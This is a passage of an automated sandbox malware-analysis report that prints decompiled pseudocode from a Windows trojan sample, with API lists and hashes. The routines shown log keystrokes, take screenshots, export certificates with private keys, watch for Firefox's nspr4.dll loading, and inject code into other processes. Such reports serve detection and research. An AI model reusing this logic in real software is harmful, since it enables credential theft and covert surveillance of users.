							if(_a28 != 0) {
								Sleep(_a28);
							}
							goto L17;
						}
					}
					_t51 = FindClose(_v1128);
				}
			}













            0x00415c05
            0x00415c09
            0x00415c0d
            0x00415c14
            0x00415d3c
            0x00415d42
            0x00415d42
            0x00415c27
            0x00415c2d
            0x00415c34
            0x00415c3a
            0x00415c43
            0x00415c43
            0x00415c48
            0x00000000
            0x00000000
            0x00415c6a
            0x00415d1b
            0x00415d2c
            0x00000000
            0x00000000
            0x00000000
            0x00415d2c
            0x00415c74
            0x00415c77
            0x00415c80
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00415c87
            0x00415c87
            0x00415c8b
            0x00415cc8
            0x00415ccd
            0x00415ced
            0x00415cf1
            0x00415cf6
            0x00415cf6
            0x00415cf8
            0x00415d16
            0x00415d16
            0x00000000
            0x00415ccd
            0x00415c8d
            0x00415ca3
            0x00415ca7
            0x00000000
            0x00000000
            0x00000000
            0x00415ca9
            0x00415cb6
            0x00415cb9
            0x00415cbb
            0x00000000
            0x00000000
            0x00415cbd
            0x00415cc1
            0x00415cc6
            0x00415cc6
            0x00000000
            0x00415cc1
            0x00415c77
            0x00415d36
            0x00415d36

            APIs
              • Part of subcall function 00415D45: PathCombineW.SHLWAPI(?,?,004014A8,004038F5,?,?,?,00000000), ref: 00415D65
            • FindFirstFileW.KERNEL32(?,?,?,?,00000000,00000000,00000104), ref: 00415C27
            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00415C4E
            • PathMatchSpecW.SHLWAPI(?,?), ref: 00415C99
            • Sleep.KERNEL32(00000000), ref: 00415CC6
            • Sleep.KERNEL32(00000000,?,?), ref: 00415CF6
            • FindNextFileW.KERNEL32(?,?), ref: 00415D24
            • FindClose.KERNEL32(?), ref: 00415D36
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Find$FilePathSleep$CloseCombineFirstMatchNextObjectSingleSpecWait
            • String ID: \|@
            • API String ID: 2348139788-1873901996
            • Opcode ID: 1cd263cefc17981cd0b735e9befd53d87b58f334536fc2cf656e31c27bcea100
            • Instruction ID: 34cdfae5f1f4439a7781b1af597a3a6261eff9f88ee715c27aa3308340705003
            • Opcode Fuzzy Hash: 1cd263cefc17981cd0b735e9befd53d87b58f334536fc2cf656e31c27bcea100
            • Instruction Fuzzy Hash: 78418C3100470ADFCB21DF14D948BDF7BA9EF84354F10892AF990962A1E33AD895CB99
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0040BB78 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 108windowCOMMON
            Download Yara Rule
            C-Code - Quality: 91%
            			E0040BB78(MSG* _a4) {
				char _v524;
				char _v780;
				char _v840;
				char _v864;
				short _v884;
				intOrPtr* _v888;
				intOrPtr _v900;
				void* __edi;
				void* __esi;
				int _t26;
				signed int _t28;
				signed int _t33;
				intOrPtr _t40;
				WCHAR* _t45;
				MSG* _t54;
				WCHAR* _t65;
				intOrPtr* _t66;
				signed int _t67;
				void* _t69;

				_t69 = (_t67 & 0xfffffff8) - 0x374;
				_t54 = _a4;
				if(_t54 == 0 || E00403E39() == 0) {
					L20:
					E00403E2A();
					return TranslateMessage(_t54);
				} else {
					_t26 = _t54->message;
					if(_t26 != 0x201) {
						__eflags = _t26 - 0x100;
						if(_t26 != 0x100) {
							goto L20;
						}
						__eflags = _t54->wParam - 0x1b;
						if(_t54->wParam == 0x1b) {
							goto L20;
						}
						_t28 = GetKeyboardState( &_v780);
						__eflags = _t28;
						if(_t28 == 0) {
							goto L20;
						}
						_t33 = ToUnicode(_t54->wParam, _t54->lParam & 0x000000ff,  &_v780,  &_v884, 9, 0);
						__eflags = _t33;
						if(_t33 <= 0) {
							goto L20;
						}
						__eflags = _t33 - 1;
						if(__eflags != 0) {
							if(__eflags > 0) {
								L18:
								__eflags = 0;
								 *((short*)(_t69 + 0x10 + _t33 * 2)) = 0;
								_push( &_v884);
								L19:
								E0040B9DA();
								goto L20;
							}
							L17:
							__eflags = _v884 - 0x20;
							if(_v884 < 0x20) {
								goto L20;
							}
							goto L18;
						}
						__eflags = _t54->wParam - 8;
						if(_t54->wParam != 8) {
							goto L17;
						}
						_push(0x402148);
						goto L19;
					}
					EnterCriticalSection(0x41aa48);
					if( *0x41aa40 > 0) {
						 *0x41aa40 =  *0x41aa40 + 0xffff;
						E0040F369(0xa3,  &_v864);
						_t40 = E0040FE5C( &_v864, 0x1e, 0x1f4);
						_v900 = _t40;
						if(_t40 != 0) {
							E0040F369(0xa1,  &_v840);
							_t65 =  &_v884;
							E0040F369(0xa2, _t65);
							_t45 =  *0x41aa38; // 0x0
							if(_t45 != 0) {
								_t65 = _t45;
							}
							E004111A5( &_v840, 0x104,  &_v524,  &_v840);
							_t66 = _v888;
							E0040D8BD(0x104, _t66,  &_v524);
							 *((intOrPtr*)( *_t66 + 8))(_t66, _t65,  *0x41a504, GetTickCount());
						}
					}
					LeaveCriticalSection(0x41aa48);
					goto L20;
				}
			}






















            0x0040bb7e
            0x0040bb85
            0x0040bb8c
            0x0040bcd5
            0x0040bcd5
            0x0040bce7
            0x0040bb9f
            0x0040bb9f
            0x0040bba7
            0x0040bc64
            0x0040bc69
            0x00000000
            0x00000000
            0x0040bc6b
            0x0040bc6f
            0x00000000
            0x00000000
            0x0040bc76
            0x0040bc7c
            0x0040bc7e
            0x00000000
            0x00000000
            0x0040bc9e
            0x0040bca4
            0x0040bca6
            0x00000000
            0x00000000
            0x0040bca8
            0x0040bcab
            0x0040bcba
            0x0040bcc4
            0x0040bcc4
            0x0040bcc6
            0x0040bccf
            0x0040bcd0
            0x0040bcd0
            0x00000000
            0x0040bcd0
            0x0040bcbc
            0x0040bcbc
            0x0040bcc2
            0x00000000
            0x00000000
            0x00000000
            0x0040bcc2
            0x0040bcad
            0x0040bcb1
            0x00000000
            0x00000000
            0x0040bcb3
            0x00000000
            0x0040bcb3
            0x0040bbb2
            0x0040bbc0
            0x0040bbcb
            0x0040bbdb
            0x0040bbea
            0x0040bbef
            0x0040bbf5
            0x0040bc00
            0x0040bc05
            0x0040bc0e
            0x0040bc13
            0x0040bc1a
            0x0040bc1c
            0x0040bc1c
            0x0040bc3d
            0x0040bc42
            0x0040bc4c
            0x0040bc54
            0x0040bc54
            0x0040bbf5
            0x0040bc5c
            0x00000000
            0x0040bc5c

            APIs
            • TranslateMessage.USER32(?), ref: 0040BCDB
              • Part of subcall function 00403E39: WaitForSingleObject.KERNEL32(00000000,00405F1B,00000310,00000000,00000310,909011A2,00000002), ref: 00403E41
            • EnterCriticalSection.KERNEL32(0041AA48), ref: 0040BBB2
            • LeaveCriticalSection.KERNEL32(0041AA48), ref: 0040BC5C
              • Part of subcall function 0040FE5C: LoadLibraryA.KERNEL32(gdiplus.dll,?,?,?), ref: 0040FE8E
              • Part of subcall function 0040FE5C: GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 0040FE9F
              • Part of subcall function 0040FE5C: GetProcAddress.KERNEL32(000001F4,GdiplusShutdown), ref: 0040FEAC
              • Part of subcall function 0040FE5C: GetProcAddress.KERNEL32(000001F4,GdipCreateBitmapFromHBITMAP), ref: 0040FEB9
              • Part of subcall function 0040FE5C: GetProcAddress.KERNEL32(000001F4,GdipDisposeImage), ref: 0040FEC6
              • Part of subcall function 0040FE5C: GetProcAddress.KERNEL32(000001F4,GdipGetImageEncodersSize), ref: 0040FED3
              • Part of subcall function 0040FE5C: GetProcAddress.KERNEL32(000001F4,GdipGetImageEncoders), ref: 0040FEE0
              • Part of subcall function 0040FE5C: GetProcAddress.KERNEL32(000001F4,GdipSaveImageToStream), ref: 0040FEED
              • Part of subcall function 0040FE5C: LoadLibraryA.KERNEL32(ole32.dll,?,?,?), ref: 0040FF35
              • Part of subcall function 0040FE5C: GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 0040FF40
              • Part of subcall function 0040FE5C: LoadLibraryA.KERNEL32(gdi32.dll,?,?,?), ref: 0040FF52
              • Part of subcall function 0040FE5C: GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 0040FF5D
              • Part of subcall function 0040FE5C: GetProcAddress.KERNEL32(?,CreateCompatibleDC), ref: 0040FF69
              • Part of subcall function 0040FE5C: GetProcAddress.KERNEL32(?,CreateCompatibleBitmap), ref: 0040FF76
              • Part of subcall function 0040FE5C: GetProcAddress.KERNEL32(?,GetDeviceCaps), ref: 0040FF83
              • Part of subcall function 0040FE5C: GetProcAddress.KERNEL32(?,SelectObject), ref: 0040FF90
              • Part of subcall function 0040FE5C: GetProcAddress.KERNEL32(?,BitBlt), ref: 0040FF9D
              • Part of subcall function 0040FE5C: GetProcAddress.KERNEL32(?,DeleteObject), ref: 0040FFAA
            • GetTickCount.KERNEL32 ref: 0040BC1E
            • GetKeyboardState.USER32(?), ref: 0040BC76
            • ToUnicode.USER32 ref: 0040BC9E
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: AddressProc$LibraryLoad$CriticalSection$CountEnterKeyboardLeaveMessageObjectSingleStateTickTranslateUnicodeWait
            • String ID:
            • API String ID: 2762424063-3916222277
            • Opcode ID: 53be9f3ad33f239bdeda54af3c80ad35e67e03f14dd7125bc779962428129741
            • Instruction ID: e08231d18bc84dcb6ded2eb18476844021f445330572d20377e9be584710106a
            • Opcode Fuzzy Hash: 53be9f3ad33f239bdeda54af3c80ad35e67e03f14dd7125bc779962428129741
            • Instruction Fuzzy Hash: E931BF316083019BEB20AB65CD49A9B77A8EF44310F04453FB955F72E2DB38C984C7AE
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00404B6E Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 62librarystringloaderCOMMON
            Download Yara Rule
            C-Code - Quality: 84%
            			E00404B6E(WCHAR* _a4, long _a8, UNICODE_STRING* _a12, HMODULE* _a16) {
				void* __edi;
				void* _t13;
				long _t14;
				void* _t17;
				void* _t18;
				void* _t22;
				void* _t23;
				void* _t24;
				UNICODE_STRING* _t25;
				void* _t29;
				HMODULE* _t30;
				struct _OBJDIR_INFORMATION _t32;

				E00403E2A();
				if(E00403E39() != 0) {
					_t30 = _a16;
					_t25 = _a12;
					_t13 =  *0x41a2c4(_a4, 0, _t25, _t30, _t24, _t29, _t18);
					_t14 = LdrLoadDll(_a4, _a8, _t25, _t30);
					_a4 = _t14;
					if(_t13 < 0 && _t14 >= 0 && _t30 != 0 &&  *_t30 != 0 && _t25 != 0) {
						EnterCriticalSection(0x41a760);
						if(( *0x41a28c & 0x00000001) == 0) {
							_t32 =  *_t30;
							if(lstrcmpiW( *(_t25 + 4), L"nspr4.dll") != 0) {
								_t17 = 0;
							} else {
								_t17 = E004064DA(_t22, _t23, _t32);
							}
							if(_t17 != 0) {
								 *0x41a28c =  *0x41a28c | 0x00000001;
							}
						}
						LeaveCriticalSection(0x41a760);
					}
					return _a4;
				}
				goto ( *0x41a2c0);
			}















            0x00404b71
            0x00404b7d
            0x00404b88
            0x00404b8c
            0x00404b96
            0x00404ba6
            0x00404bac
            0x00404bb1
            0x00404bca
            0x00404bd7
            0x00404bdc
            0x00404bec
            0x00404bf7
            0x00404bee
            0x00404bf0
            0x00404bf0
            0x00404bfb
            0x00404bfd
            0x00404bfd
            0x00404bfb
            0x00404c05
            0x00404c05
            0x00404c12
            0x00404c12
            0x00404b80

            APIs
              • Part of subcall function 00403E2A: WaitForSingleObject.KERNEL32(000000FF,00404A1C), ref: 00403E32
              • Part of subcall function 00403E39: WaitForSingleObject.KERNEL32(00000000,00405F1B,00000310,00000000,00000310,909011A2,00000002), ref: 00403E41
            • LdrGetDllHandle.NTDLL(?,00000000,?,?), ref: 00404B96
            • LdrLoadDll.NTDLL(?,?,?,?), ref: 00404BA6
            • EnterCriticalSection.KERNEL32(0041A760), ref: 00404BCA
            • lstrcmpiW.KERNEL32(?,nspr4.dll), ref: 00404BE4
            • LeaveCriticalSection.KERNEL32(0041A760), ref: 00404C05
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: CriticalObjectSectionSingleWait$EnterHandleLeaveLoadlstrcmpi
            • String ID: @xIw$nspr4.dll
            • API String ID: 535701974-2259834031
            • Opcode ID: 7ac4b77c6cab6ce32a43cbb7000b02916107e38f2214fb2c92d661dca98e51c2
            • Instruction ID: 3ba081853ac8bbff4652b9135745bf2aa541a484130f759e0cfe84903ceb8739
            • Opcode Fuzzy Hash: 7ac4b77c6cab6ce32a43cbb7000b02916107e38f2214fb2c92d661dca98e51c2
            • Instruction Fuzzy Hash: 981104B1106204ABDB109F51DC48BAB3BA8AF80315F01807AFE04B33A1D739EC11CBAD
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00409FE2 Relevance: 12.1, APIs: 8, Instructions: 124encryptiontimeCOMMON
            Download Yara Rule
            C-Code - Quality: 16%
            			E00409FE2(intOrPtr __eax) {
				char _v588;
				char _v716;
				char _v844;
				char _v885;
				intOrPtr _v892;
				intOrPtr _v893;
				char _v896;
				char _v900;
				char _v901;
				char _v904;
				char _v908;
				struct _SYSTEMTIME _v924;
				intOrPtr _v928;
				intOrPtr _v940;
				intOrPtr _v944;
				char _v949;
				void* __edi;
				void* __esi;
				void* _t33;
				void* _t34;
				intOrPtr _t40;
				void* _t63;
				WCHAR* _t67;
				void* _t68;
				void* _t69;
				void* _t71;
				void* _t73;
				intOrPtr* _t75;
				char* _t76;
				intOrPtr* _t77;
				char* _t78;

				_v885 = 0;
				__imp__CertOpenSystemStoreW(0, L"MY", _t69, _t73, _t63);
				_v892 = __eax;
				if(__eax == 0) {
					L16:
					return _v893;
				}
				_t75 = __imp__CertEnumCertificatesInStore;
				_t71 = 0;
				_t33 =  *_t75(__eax, 0);
				if(_t33 == 0) {
					L4:
					_v901 = 1;
					L15:
					__imp__CertCloseStore(_v900, 0);
					goto L16;
				} else {
					goto L2;
				}
				do {
					L2:
					_t71 = _t71 + 1;
					_t33 =  *_t75(_v900, _t33);
				} while (_t33 != 0);
				if(_t71 != 0) {
					_t76 =  &_v896;
					_t34 = 0x7f;
					_v900 = 0;
					_v904 = 0;
					E0040F369(_t34, _t76);
					_push(4);
					_push(0);
					_t77 = __imp__PFXExportCertStoreEx;
					_push(_t76);
					_push( &_v904);
					_push(_v908);
					if( *_t77() != 0) {
						_t39 = _v924.wYear;
						if(_v924.wYear != 0) {
							_t40 = E004103ED(_t39);
						} else {
							_t40 = 0;
						}
						_v924.wDayOfWeek = _t40;
						if(_t40 != 0) {
							_push(4);
							_push(0);
							_push( &(_v924.wHour));
							_push( &_v924);
							_push(_v928);
							if( *_t77() != 0) {
								_t67 =  &_v844;
								E004107C1(_t43 | 0xffffffff, L"MY", _t67);
								CharLowerW(_t67);
								GetSystemTime( &_v924);
								_t78 =  &_v908;
								E0040F369(0x80, _t78);
								E00409F84( &_v588, L"MY");
								_push(_v924.wYear & 0x0000ffff);
								_push(_v924.wMonth & 0x0000ffff);
								_push(_v924.wDay & 0x0000ffff);
								_push( &_v844);
								_push( &_v588);
								_push(_t78);
								_t68 = 0x3e;
								if(E004111A5(_t78, _t68,  &_v716) > 0 && E0040D77B(L"MY", _t68, 2, L"MY",  &_v716, _v940, _v944) != 0) {
									_v949 = 1;
								}
							}
							E00410418(_v940);
						}
					}
					goto L15;
				}
				goto L4;
			}


































            0x00409ff9
            0x00409ffd
            0x0040a003
            0x0040a009
            0x0040a152
            0x0040a15c
            0x0040a15c
            0x0040a00f
            0x0040a017
            0x0040a019
            0x0040a01d
            0x0040a02f
            0x0040a02f
            0x0040a147
            0x0040a14c
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x0040a01f
            0x0040a01f
            0x0040a024
            0x0040a025
            0x0040a027
            0x0040a02d
            0x0040a03b
            0x0040a03f
            0x0040a040
            0x0040a044
            0x0040a048
            0x0040a04d
            0x0040a04f
            0x0040a052
            0x0040a058
            0x0040a05d
            0x0040a05e
            0x0040a066
            0x0040a06c
            0x0040a072
            0x0040a078
            0x0040a074
            0x0040a074
            0x0040a074
            0x0040a07d
            0x0040a083
            0x0040a089
            0x0040a08b
            0x0040a090
            0x0040a095
            0x0040a096
            0x0040a09e
            0x0040a0ac
            0x0040a0b0
            0x0040a0b8
            0x0040a0c3
            0x0040a0c9
            0x0040a0d2
            0x0040a0de
            0x0040a0e8
            0x0040a0ee
            0x0040a0f4
            0x0040a0fc
            0x0040a104
            0x0040a107
            0x0040a10a
            0x0040a11c
            0x0040a139
            0x0040a139
            0x0040a11c
            0x0040a142
            0x0040a142
            0x0040a083
            0x00000000
            0x0040a066
            0x00000000

            APIs
            • CertOpenSystemStoreW.CRYPT32(00000000,00402014), ref: 00409FFD
            • CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 0040A019
            • CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 0040A025
            • PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004), ref: 0040A062
            • PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004), ref: 0040A09A
            • CharLowerW.USER32(?,?,?,00000001), ref: 0040A0B8
            • GetSystemTime.KERNEL32(?,?,?,?,00000001), ref: 0040A0C3
              • Part of subcall function 004103ED: HeapAlloc.KERNEL32(00000008,-00000004,00411BB4,00000000,?,?,?,?,0040373A,00000000,00403AF4,?,00000000), ref: 004103F9
            • CertCloseStore.CRYPT32(?,00000000), ref: 0040A14C
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: CertStore$CertificatesEnumExportSystem$AllocCharCloseHeapLowerOpenTime
            • String ID:
            • API String ID: 3339301666-0
            • Opcode ID: c3f352f38bc916b98d38fbf18ee1be4fc058f41b8498e8bdad68366fedb35cdb
            • Instruction ID: dbc4ab35c3e2d5bfe5da6efe3f5af33bbf8d3252b6eaa7a60860ca1ff7d30bfa
            • Opcode Fuzzy Hash: c3f352f38bc916b98d38fbf18ee1be4fc058f41b8498e8bdad68366fedb35cdb
            • Instruction Fuzzy Hash: DA41A472108345AAD7119F658D84AAB7BDCAB88344F00093FFAC4F21E1D678D9588767
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00404D06 Relevance: 12.1, APIs: 8, Instructions: 114processCOMMON
            Download Yara Rule
            C-Code - Quality: 98%
            			E00404D06() {
				char _v5;
				signed int _v12;
				signed int _v16;
				void* _v20;
				int _v24;
				void* _v28;
				char _v32;
				long _v588;
				void* _v596;
				void* __esi;
				void* _t42;
				int _t46;
				signed int _t48;
				void* _t49;
				long _t57;
				intOrPtr* _t58;
				void** _t60;
				void** _t61;
				void** _t63;
				long _t66;
				int _t72;
				void** _t73;
				void* _t74;

				_t72 = 0;
				_v5 = 0;
				_v16 = 0;
				_v12 = 0;
				while(1) {
					_t42 = CreateToolhelp32Snapshot(2, _t72);
					_v20 = _t42;
					_v24 = _t72;
					if(_t42 == 0xffffffff) {
						break;
					} else {
						_push( &_v596);
						_v596 = 0x22c;
						_t46 = Process32FirstW(_v20);
					}
					while(_t46 != 0) {
						_t66 = _v588;
						__eflags = _t66 - _t72;
						if(_t66 <= _t72) {
							L20:
							_t46 = Process32NextW(_v20,  &_v596);
							continue;
						}
						__eflags = _t66 -  *0x41a504; // 0x0
						if(__eflags == 0) {
							goto L20;
						}
						_t48 = 0;
						__eflags = _v12 - _t72;
						if(_v12 <= _t72) {
							L8:
							_t49 = E00403C5D(_t66, _t71, _t66);
							_v28 = _t49;
							__eflags = _t49 - _t72;
							if(_t49 == _t72) {
								goto L20;
							}
							_t74 = OpenProcess(0x400, _t72, _v588);
							__eflags = _t74 - _t72;
							if(_t74 == _t72) {
								L19:
								CloseHandle(_v28);
								goto L20;
							}
							_t73 = E00411A2C(_t66, _t74,  &_v32);
							CloseHandle(_t74);
							__eflags = _t73;
							if(_t73 == 0) {
								L18:
								_t72 = 0;
								__eflags = 0;
								goto L19;
							} else {
								__eflags = _v32 -  *0x41a2a0; // 0x0
								if(__eflags == 0) {
									_t57 = GetLengthSid( *_t73);
									__eflags = _t57 -  *0x41a298;
									if(_t57 ==  *0x41a298) {
										_t58 =  *0x41a294; // 0x0
										_t60 = E00410489( *_t58,  *_t73, _t57);
										__eflags = _t60;
										if(_t60 == 0) {
											_t61 = E004103A8(4 + _v12 * 4,  &_v16);
											__eflags = _t61;
											if(_t61 != 0) {
												_t71 = _v12;
												_v12 = _v12 + 1;
												_v24 = _v24 + 1;
												 *((intOrPtr*)(_v16 + _v12 * 4)) = _v588;
												_t63 = E00404C7D(_v16, _v588, _v28);
												__eflags = _t63;
												if(_t63 != 0) {
													_v5 = 1;
												}
											}
										}
									}
								}
								E00410418(_t73);
								goto L18;
							}
						} else {
							goto L6;
						}
						while(1) {
							L6:
							_t71 = _v16;
							__eflags =  *((intOrPtr*)(_t71 + _t48 * 4)) - _t66;
							if( *((intOrPtr*)(_t71 + _t48 * 4)) == _t66) {
								goto L20;
							}
							_t48 = _t48 + 1;
							__eflags = _t48 - _v12;
							if(_t48 < _v12) {
								continue;
							}
							goto L8;
						}
						goto L20;
					}
					CloseHandle(_v20);
					if(_v24 != _t72) {
						continue;
					}
					break;
				}
				E00410418(_v16);
				return _v5;
			}


























            0x00404d18
            0x00404d1a
            0x00404d1e
            0x00404d21
            0x00404d24
            0x00404d27
            0x00404d2c
            0x00404d2f
            0x00404d35
            0x00000000
            0x00404d3b
            0x00404d41
            0x00404d45
            0x00404d4f
            0x00404d4f
            0x00404e57
            0x00404d59
            0x00404d5f
            0x00404d61
            0x00404e48
            0x00404e52
            0x00000000
            0x00404e52
            0x00404d67
            0x00404d6d
            0x00000000
            0x00000000
            0x00404d73
            0x00404d75
            0x00404d78
            0x00404d8c
            0x00404d8d
            0x00404d92
            0x00404d95
            0x00404d97
            0x00000000
            0x00000000
            0x00404daf
            0x00404db1
            0x00404db3
            0x00404e43
            0x00404e46
            0x00000000
            0x00404e46
            0x00404dc4
            0x00404dc6
            0x00404dc8
            0x00404dca
            0x00404e41
            0x00404e41
            0x00404e41
            0x00000000
            0x00404dcc
            0x00404dcf
            0x00404dd5
            0x00404dd9
            0x00404ddf
            0x00404de5
            0x00404dea
            0x00404df1
            0x00404df6
            0x00404df8
            0x00404e07
            0x00404e0c
            0x00404e0e
            0x00404e10
            0x00404e1f
            0x00404e22
            0x00404e25
            0x00404e2e
            0x00404e33
            0x00404e35
            0x00404e37
            0x00404e37
            0x00404e35
            0x00404e0e
            0x00404df8
            0x00404de5
            0x00404e3c
            0x00000000
            0x00404e3c
            0x00000000
            0x00000000
            0x00000000
            0x00404d7a
            0x00404d7a
            0x00404d7a
            0x00404d7d
            0x00404d80
            0x00000000
            0x00000000
            0x00404d86
            0x00404d87
            0x00404d8a
            0x00000000
            0x00000000
            0x00000000
            0x00404d8a
            0x00000000
            0x00404d7a
            0x00404e62
            0x00404e67
            0x00000000
            0x00000000
            0x00000000
            0x00404e67
            0x00404e70
            0x00404e7c

            APIs
            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00404D27
            • Process32FirstW.KERNEL32(?,?), ref: 00404D4F
            • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,00000000), ref: 00404DA9
            • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 00404DC6
            • GetLengthSid.ADVAPI32(00000000,?,?,00000000), ref: 00404DD9
            • CloseHandle.KERNEL32(?,?,?,00000000), ref: 00404E46
            • Process32NextW.KERNEL32(?,0000022C), ref: 00404E52
            • CloseHandle.KERNEL32(?,?,?,00000000), ref: 00404E62
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: CloseHandle$Process32$CreateFirstLengthNextOpenProcessSnapshotToolhelp32
            • String ID:
            • API String ID: 1981844004-0
            • Opcode ID: 369542b11766d6424d5851c6e019376f8857cef6f7fdc2e87e5c3f6637496cd1
            • Instruction ID: 4643b66a8e214e9c13321d57bf3fe8223af9f4886db32d22fca3ed06bcf55dfe
            • Opcode Fuzzy Hash: 369542b11766d6424d5851c6e019376f8857cef6f7fdc2e87e5c3f6637496cd1
            • Instruction Fuzzy Hash: D34162B1900119AFCF21EFA5CC84AEEBB75FFC5305F1005AAE615B32A1D7395981CB58
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00411ADE Relevance: 10.6, APIs: 7, Instructions: 52threadCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00411ADE(WCHAR* _a4) {
				void* _v12;
				intOrPtr _v16;
				struct _TOKEN_PRIVILEGES _v28;
				int _t23;

				_t23 = 0;
				if(OpenThreadToken(GetCurrentThread(), 0x20, 0,  &_v12) != 0 || OpenProcessToken(0xffffffff, 0x20,  &_v12) != 0) {
					_v28.PrivilegeCount = 1;
					_v16 = 2;
					if(LookupPrivilegeValueW(_t23, _a4,  &(_v28.Privileges)) != 0 && AdjustTokenPrivileges(_v12, _t23,  &_v28, _t23, _t23, _t23) != 0 && GetLastError() == 0) {
						_t23 = 1;
					}
					CloseHandle(_v12);
					return _t23;
				} else {
					return 0;
				}
			}







            0x00411ae9
            0x00411afd
            0x00411b1c
            0x00411b24
            0x00411b33
            0x00411b54
            0x00411b54
            0x00411b59
            0x00000000
            0x00411b11
            0x00000000
            0x00411b11

            APIs
            • GetCurrentThread.KERNEL32 ref: 00411AEE
            • OpenThreadToken.ADVAPI32(00000000), ref: 00411AF5
            • OpenProcessToken.ADVAPI32(000000FF,00000020,?), ref: 00411B07
            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00411B2B
            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 00411B40
            • GetLastError.KERNEL32 ref: 00411B4A
            • CloseHandle.KERNEL32(?), ref: 00411B59
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Token$OpenThread$AdjustCloseCurrentErrorHandleLastLookupPrivilegePrivilegesProcessValue
            • String ID:
            • API String ID: 2724707430-0
            • Opcode ID: 0087c70a0c2657f0201c7e220bb7e5f7079aa5b5a04956fa9d824f59dd3897f2
            • Instruction ID: 6c60eaf9677207f317200d55daea23e9e7311101372178ac77fe26de3629aa2c
            • Opcode Fuzzy Hash: 0087c70a0c2657f0201c7e220bb7e5f7079aa5b5a04956fa9d824f59dd3897f2
            • Instruction Fuzzy Hash: F7011E75604208BFEB109FE1ED89EEF7BBCEB15354F004066F602E2170E73499859A38
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00404A40 Relevance: 9.1, APIs: 6, Instructions: 84threadnativeinjectionCOMMON
            Download Yara Rule
            C-Code - Quality: 83%
            			E00404A40(void* __edx, void** _a4, void** _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, void* _a32, intOrPtr _a36, intOrPtr _a40, void* _a44) {
				struct _CONTEXT _v720;
				void* __edi;
				void* __esi;
				intOrPtr _t33;
				void* _t37;
				void* _t38;
				void** _t46;
				void* _t47;
				void* _t48;
				void** _t51;
				void* _t53;
				void* _t54;
				signed int _t56;
				void* _t66;

				_t48 = __edx;
				E00403E2A();
				_t46 = _a4;
				_t33 =  *0x41a2b4(_t46, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44);
				_a40 = _t33;
				if(_t33 >= 0 && (_a32 & 0x00000001) != 0 && _t46 != 0 && _a8 != 0 && E00403E39() != 0 && GetProcessId( *_t46) != 0) {
					_t37 = E00403C5D(_t47, _t48, _t36);
					_a44 = _t37;
					_t64 = _t37;
					if(_t37 != 0) {
						_push(_t53);
						_t38 = E00403D3B(_t47,  *_t46, _t53, _t64, _t37, 0);
						_t51 = _a8;
						_t54 = _t38;
						_a32 = _t54;
						_t56 = _t54 -  *0x41a2a4 + E00404356;
						_v720.ContextFlags = 0x10003;
						if(GetThreadContext( *_t51,  &_v720) == 0) {
							L12:
							VirtualFreeEx( *_t46, _a32, 0, 0x8000);
						} else {
